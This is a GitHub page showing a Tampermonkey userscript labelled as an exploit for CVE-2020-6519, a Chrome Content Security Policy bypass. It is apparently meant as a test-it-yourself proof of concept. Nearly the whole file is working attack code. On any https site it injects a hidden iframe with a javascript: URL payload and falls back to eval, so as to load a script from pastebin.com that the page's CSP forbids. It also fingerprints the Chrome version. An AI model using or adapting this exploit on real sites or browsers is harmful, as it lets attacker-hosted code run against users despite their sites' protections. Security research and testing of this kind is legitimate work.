forked from PerimeterX/CVE-2020-6519
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2020-6519-TEST-IT-YOURSELF.js
152 lines (138 loc) Β· 4.82 KB
/
CVE-2020-6519-TEST-IT-YOURSELF.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
// ==UserScript==
// @name EXPLOIT-CVE-2020-6519
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author Gal Weizman ([email protected])
// @match https://*/*
// @grant none
// ==/UserScript==
const cve_entire_func = function (fail = false) {
top._CVE_START = true;
function exploit () {
message ('start running exploit');
top._MESSAGE = message;
top._CVE_URL = 'https://pastebin.com/raw/XpHsfXJQ';
top._xxx = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script was successfully fetched from https://pastebin.com/raw/XpHsfXJQ even though Content Security Policy does not allow it! π₯ππ»π"); };
top._yyy = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script failed to be fetched from https://pastebin.com/raw/XpHsfXJQ thanks to this Chrome being patched for CVE-2020-6519! π₯³ππ»π (but this website's CSP is still not well configured though...)"); };
var payload = `
top.SUCCESS = true;
var s = document.createElement("script");
s.src = top._CVE_URL;
s.onload = top._xxx;
s.onerror = top._yyy;
document.body.appendChild(s);
`;
div2.innerHTML +=
"<iframe id='_XXX' style='display:none' src='javascript:" +
payload +
"'></iframe>";
setTimeout (() => {
if (!top.SUCCESS) {
_XXX.contentWindow.eval (payload);
}
});
setTimeout (() => {
message (
'in case exploitation succeeded - an alert message originated by the forbidden script should pop up'
);
message ('finish testing exploitability');
}, 500);
}
function css (color = 'greenyellow') {
const content = `div.sticky {position: -webkit-sticky;position: sticky;top: 0;padding: 50px;background-color: ${color};font-size: 20px;}`;
const style = document.createElement ('style');
style.id = 'CVE_STYLE';
style.textContent = content;
document.head.appendChild (style);
}
function start () {
message ('start testing exploitability');
document.body.prepend (div);
document.body.prepend (div2);
css ();
exploit ();
}
function message () {
const args = [].slice.call (arguments);
console.log.apply (null, ['CVE-2020-6519-exploit: '].concat (args));
const p = document.createElement ('li');
p.innerText = args.join (' ');
div.appendChild (p);
}
function getIsVulnerable () {
if (isVulnerable !== undefined) return isVulnerable;
const ua = navigator.userAgent;
message ('User Agent: ', ua);
const uaParts = ua.split (' ');
for (var i = 0; i < uaParts.length; i++) {
if (0 !== uaParts[i].indexOf ('Chrome')) continue;
const version = uaParts[i].replace ('Chrome/', '').split ('.')[0];
isVulnerable = parseInt (version) < 84 && parseInt (version) > 72;
message (
'Chrome',
isVulnerable ? 'is' : 'is not',
'vulnerable to CVE-2020-6519',
isVulnerable ? 'π₯' : 'π',
'(version',
version,
'major)'
);
break;
}
return isVulnerable;
}
let div, div2, isVulnerable;
function init () {
div2 = document.createElement ('div');
div2.id = 'b';
div2.style.display = 'none';
div = document.createElement ('div');
div.id = 'a';
div.setAttribute ('class', 'sticky');
const b = document.createElement ('b');
b.innerText = 'CVE-2020-6519-exploit: ';
div.appendChild (b);
//div.setAttribute('dir', 'rtl');
isVulnerable = getIsVulnerable ();
if (fail) {
document.body.prepend (div);
document.body.prepend (div2);
css ();
message (
'script failed to load from https://pastebin.com/raw/XpHsfXJQ thanks to this website\'s Content Security Policy not allowing unsafe execution of scripts! ππ»πππ»πππ»'
);
return;
}
const s = document.createElement ('script');
s.src = 'https://pastebin.com/raw/95f4NkAL';
s.onload = () => {
document.body.prepend (div);
document.body.prepend (div2);
css ('red');
message (
'this website is vulnerable due to poorley configured Content Security Policy'
);
message (
'therefore, there is no reason to even check whether CVE-2020-6519 is exploitable or not - loading unwanted scripts can be done without it πππ'
);
};
s.onerror = () => {
start ();
};
document.head.appendChild (s);
}
init ();
};
function check () {
const s = document.createElement ('script');
s.textContent = '(' + cve_entire_func + '())';
top._CVE_START = false;
setTimeout (() => {
if (!_CVE_START) cve_entire_func (true);
}, 1500);
document.head.appendChild (s);
}
(function () {
check ();
}) ();